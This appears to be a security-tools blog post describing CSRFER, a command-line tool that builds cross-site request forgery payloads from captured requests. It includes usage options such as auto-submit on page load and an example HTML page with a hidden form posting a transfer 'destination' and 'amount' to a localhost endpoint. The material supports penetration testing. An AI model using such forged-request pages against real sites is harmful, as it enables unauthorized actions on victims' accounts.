CSRFER : Tool To Generate CSRF Payloads Based On Vulnerable Requests

CSRFER is a tool to generate csrf payloads, based on vulnerable requests. It parses supplied requests to generate either a form or a fetch request. The payload can then be embedded in an html template.

Installation

npm install -g csrfer

Usage

Usage: csrfer [options]

Options:
–version Show version number
-r, –request Path to the request file to be used
-m, –mode Mode to generate the code. Available options: form, fetch. (Default is form)
-a, –autosubmit Auto submit the request on page load
-s, –show Show the form inputs (only for form mode)
-o, –output Output the payload to the specified file instead of STDOUT
-t, –template Path to an html template page. Use the placeholder {{CONTENT}} to specify where to
inject the code (in html, not JS)
-T, –defaulttemplate Use this option if you want the code to be injected into a default html page.
-h, –help Show help

Examples:
csrfer -r req.txt -m form -a Automatically submit a form request
csrfer -r req.txt -m form -s Generate and shows a form to be submitted manually
csrfer -r req.txt -m fetch -t my_template.html Generates a fetch request and uses the supplied template
page

Example Output

<!DOCTYPE html>
<html>

<head>
  <title>This is Hello World page</title>
</head>

<body>
  <h1>Hello World</h1>

  <form id="csrf" name="csrf" action="http://localhost:8000/1.php" method="POST"
    enctype="application/x-www-form-urlencoded"><input id='destination' name='destination' type='hidden'
      value='123-123123-123' /><br><input id='amount' name='amount' type='hidden' value='50&#x20AC;' /><br><input
      type='submit' value='submit'></form>
</body>

</html>
R K

Recent Posts

Pystinger : Bypass Firewall For Traffic Forwarding Using Webshell

Pystinger is a Python-based tool that enables SOCKS4 proxying and port mapping through webshells. It…

6 days ago

CVE-Search : A Tool To Perform Local Searches For Known Vulnerabilities

Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…

6 days ago

CVE-Search : A Tool To Perform Local Searches For Known Vulnerabilities

Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…

7 days ago

How to Bash Append to File: A Simple Guide for Beginners

If you are working with Linux or writing bash scripts, one of the most common…

7 days ago

Mastering the Bash Case Statement with Simple Examples

What is a bash case statement? A bash case statement is a way to control…

7 days ago

How to Check if a File Exists in Bash – Simply Explained

Why Do We Check Files in Bash? When writing a Bash script, you often work…

1 week ago